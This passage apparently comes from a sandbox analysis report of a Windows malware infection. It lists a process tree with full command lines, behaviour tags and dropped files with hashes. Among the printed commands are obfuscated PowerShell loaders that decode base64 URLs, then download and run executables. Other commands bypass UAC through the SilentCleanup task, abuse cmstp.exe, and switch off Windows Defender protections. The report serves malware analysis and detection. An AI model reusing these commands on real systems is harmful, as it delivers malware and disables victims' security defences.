$rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Maps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exePID:4092timeout 1Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:2532"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:5112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestSuspicious behavior: EnumeratesProcesses
-
C:\Users\Public\nqu.exePID:720"C:\Users\Public\nqu.exe"Executes dropped EXEChecks whether UAC is enabledMaps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exePID:5300"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exePID:3620"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exePID:1336"{path}"Executes dropped EXELoads dropped DLLChecks processor information in registry
-
C:\Windows\SysWOW64\cmd.exePID:6636"C:\Windows\System32\cmd.exe" /c taskkill /pid 1336 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\337278076516208\\* & exit
-
C:\Windows\SysWOW64\taskkill.exePID:2936taskkill /pid 1336Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exePID:1404"{path}"Executes dropped EXE
-
C:\Users\Public\nqu.exePID:5472"{path}"Executes dropped EXE
-
C:\Users\Public\nqu.exePID:5052"{path}"Executes dropped EXELoads dropped DLLDrops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exePID:5484"C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exePID:5456"C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exePID:1928"C:\Users\Admin\AppData\Local\Temp\RxfEjqsctc.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exePID:4828"C:\Users\Admin\AppData\Local\Temp\QufVBH3jUE.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Program Files (x86)\internet explorer\ieinstal.exePID:7132"C:\Program Files (x86)\internet explorer\ieinstal.exe"
-
C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exePID:5512"C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exePID:5660"C:\Users\Admin\AppData\Local\Temp\fYDz9wNnYe.exe"Executes dropped EXESuspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exePID:748"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kibbhhvr.inf
-
C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exePID:3876"C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exePID:5852"C:\Users\Admin\AppData\Local\Temp\a0k7SvAzhM.exe"Executes dropped EXEWindows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:2156"powershell" Get-MpPreference -verbose
-
C:\Windows\SysWOW64\cmd.exePID:4852cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nqu.exe"
-
C:\Windows\SysWOW64\timeout.exePID:6028timeout /T 10 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:4868"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:3272"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exePID:196timeout 2Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:4960"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:4412"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestSuspicious behavior: EnumeratesProcesses
-
C:\Users\Public\ejf.exePID:5096"C:\Users\Public\ejf.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:1796"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:5116"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXESuspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:4240"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:4404"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXELoads dropped DLLSuspicious use of NtSetInformationThreadHideFromDebuggerChecks processor information in registry
-
C:\Windows\SysWOW64\cmd.exePID:3440"C:\Windows\System32\cmd.exe" /c taskkill /pid 4404 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\386531223269341\\* & exit
-
C:\Windows\SysWOW64\taskkill.exePID:804taskkill /pid 4404Kills process with taskkill
-
C:\Users\Public\ejf.exePID:4236"C:\Users\Public\ejf.exe"Executes dropped EXELoads dropped DLLChecks whether UAC is enabledDrops desktop.ini file(s)Maps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exePID:4244"C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exePID:3132"C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exePID:552"C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exePID:4504"C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe"Executes dropped EXEAdds Run key to start applicationSuspicious use of SetThreadContextModifies system certificate store
-
C:\Windows\SysWOW64\svchost.exePID:4448"C:\Windows\System32\svchost.exe"
-
C:\Windows\SysWOW64\cmd.exePID:5560C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
-
C:\Windows\SysWOW64\reg.exePID:4480reg delete hkcu\Environment /v windir /fModifies registry key
-
C:\Windows\SysWOW64\reg.exePID:5584reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exePID:4672schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
-
C:\Windows\SysWOW64\reg.exePID:5356reg delete hkcu\Environment /v windir /fModifies registry key
-
C:\Windows\SysWOW64\cmd.exePID:5216C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
-
C:\Program Files (x86)\internet explorer\ieinstal.exePID:5056"C:\Program Files (x86)\internet explorer\ieinstal.exe"
-
C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exePID:4660"C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exePID:2788"C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exePID:496"C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"Executes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exePID:1096"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\yfny2ejf.inf
-
C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exePID:4380"C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exePID:1772"C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"Executes dropped EXEWindows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:2920"powershell" Get-MpPreference -verbose
-
C:\Windows\SysWOW64\cmd.exePID:2572cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ejf.exe"
-
C:\Windows\SysWOW64\timeout.exePID:4984timeout /T 10 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:3992"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:4668"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Maps connected drives based on registrySuspicious use of NtSetInformationThreadHideFromDebuggerSuspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\DllHost.exePID:3904C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
-
C:\Windows\SysWOW64\cmd.exePID:3240cmd /c start C:\Windows\temp\nynibecq.exe
-
C:\Windows\temp\nynibecq.exePID:3964C:\Windows\temp\nynibecq.exeExecutes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4316"powershell" Get-MpPreference -verbose
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3016"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4664"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5104"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3828"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4912"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5168"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5260"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5416"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5504"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5620"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
-
C:\Windows\SysWOW64\taskkill.exePID:2444taskkill /IM cmstp.exe /FKills process with taskkill
-
C:\Windows\SysWOW64\cmd.exePID:5476cmd /c start C:\Windows\temp\2eurzuuj.exe
-
C:\Windows\temp\2eurzuuj.exePID:5848C:\Windows\temp\2eurzuuj.exeExecutes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:2968"powershell" Get-MpPreference -verbose
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5704"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5724"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:6060"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5608"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5132"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5688"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5380"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:5904"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4168"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:6020"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:6196"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
-
C:\Windows\SysWOW64\taskkill.exePID:3084taskkill /IM cmstp.exe /FKills process with taskkill
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
Replay Monitor
00:00
00:00
Downloads
-
C:\ProgramData\mozglue.dll
-
C:\ProgramData\nss3.dll
-
C:\ProgramData\nss3.dll
-
C:\ProgramData\sqlite3.dll
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
-
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKqzN9zoCZ.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MYbv6sblhd.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RxfEjqsctc.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a0k7SvAzhM.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fYDz9wNnYe.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hGSBLC0mMB.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
b751492c41c6f3173d3b6f31c1b9b4eb
SHA1abc53a2c939b1d774940deb0b888b7b1ba5a3c7b
SHA256ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457
SHA512afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\VHMGP9BO.cookie
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9da8cb615d8f21b1899bfa25a4bf350b
SHA1ba9402a68b0408113647264b5627e159c57252ec
SHA2566a617c0c28868cda6c0e5c2a95cbf87616327315b48730402da8b451439a9867
SHA5127cf3df514cd0d4b3c291a42d54d0d27395cce5acf3c01e5fa4eede6394f51836505caba6c795b17b1974fd240950baddde467215ab857d3970b62a13e52d6223
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9da8cb615d8f21b1899bfa25a4bf350b
SHA1ba9402a68b0408113647264b5627e159c57252ec
SHA2566a617c0c28868cda6c0e5c2a95cbf87616327315b48730402da8b451439a9867
SHA5127cf3df514cd0d4b3c291a42d54d0d27395cce5acf3c01e5fa4eede6394f51836505caba6c795b17b1974fd240950baddde467215ab857d3970b62a13e52d6223
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
